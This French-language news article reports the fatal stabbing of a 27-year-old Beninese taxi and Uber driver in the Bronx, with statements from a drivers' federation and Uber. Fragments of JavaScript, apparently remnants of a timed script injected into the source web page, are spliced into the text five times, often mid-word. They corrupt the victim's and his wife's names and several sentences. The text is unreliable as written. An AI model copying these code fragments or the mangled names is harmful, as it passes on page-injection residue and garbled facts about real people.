Etats Unis : un taximan béninois poignardé à mort
C’est dans la nuit du dimanche ce lundi dans l’état de Bronx qu’un cidom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toyen béninois âgé de 27 ans, a été retrouvé par la police vers 21 heures sur Hutchinson River Parkway East. Selon ceux-ci, il était assis dans une voiture noire de marque Toyota Camry et présentait plusieurs coups de couteau à la nuque et au corps. Il a été ensuite transporté à l’hôpital Jacobi, où il a été déclaré mort par le corps médical.
Selon son épouse Latifadom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tou Alimi, Ganiou Gdom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andonou avait quitté son domicile au alendom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tours de 19 heures. Ganiou Gdom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andonou laisse derrière lui un fils de 2 ans.

Rappelons que Ganiou exerce le métier de chauffeur taxi dans l’état de new York depuis quelques années. La fédération des chauffeurs de taxi de l’État de New York a déclaré dans un communiqué: « Il s’agissait d’une attaque sauvage dirigée contre un jeune homme qui tentait de gagner sa vie. Il faut un animal, quelqu’un qui n’a aucun type de remords pour poignarder brutalement quelqu’un à mort pour le voler. « Un porte-parole d’Uber a également déclaré dans un communiqué: « Il s’agit d’un incident horriblement tragique et notre cœur va à la famille en deuil. Nous sommes prêts à collaborer avec les forces de l’ordre pour assister leur enquête de dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toutes les manières possibles ».
Selon nos informations, la fédération offrirait une récompense de 3 000 dollars pour les informations pouvant aboutir à trouver le ou les coupables dans ce macabre assassinat. Pour l’heure, la police n’a encore procédé à aucune arrestation dans cette affaire et l’enquête est en cours.